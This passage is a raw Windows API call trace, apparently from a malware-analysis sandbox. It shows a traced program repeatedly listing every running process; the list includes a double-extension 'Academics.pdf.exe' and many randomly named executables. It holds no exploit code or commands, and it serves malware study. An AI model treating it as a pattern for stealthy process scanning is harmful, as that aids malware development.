lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.885] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0292.886] CloseHandle (hObject=0x294) returned 1 [0292.886] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0292.886] TranslateMessage (lpMsg=0x8bf970) returned 0 [0292.886] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0292.886] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0292.886] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0292.886] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.886] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0292.886] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0292.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0292.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0292.886] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0292.887] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0292.887] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0292.887] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0292.889] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.890] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.890] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.891] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.892] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.893] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.894] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.895] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.895] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.896] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0292.897] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.898] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.899] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.900] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.900] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.901] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0292.902] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.903] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.904] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.904] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.905] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.906] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0292.907] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.908] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0292.909] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0292.910] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0292.910] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0292.911] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0292.912] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0292.913] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0292.914] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0292.915] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0292.916] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0292.916] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0292.917] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0292.918] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0292.919] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0292.920] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0292.921] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0292.921] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0292.922] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0292.923] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0292.924] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.925] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.926] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0292.926] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.927] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0292.928] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0292.929] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0292.930] CloseHandle (hObject=0x294) returned 1 [0292.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0292.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0292.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0292.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0292.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0292.930] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0292.930] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0292.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0292.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0292.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0292.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0292.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0292.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0292.930] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0292.932] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.933] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0292.934] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0292.935] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.936] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0292.937] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0292.938] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0292.939] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0292.939] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0292.940] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0292.941] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.942] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.943] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.944] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.944] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.945] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0292.946] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.947] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0292.948] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0292.949] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0292.949] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0292.950] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0292.951] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, 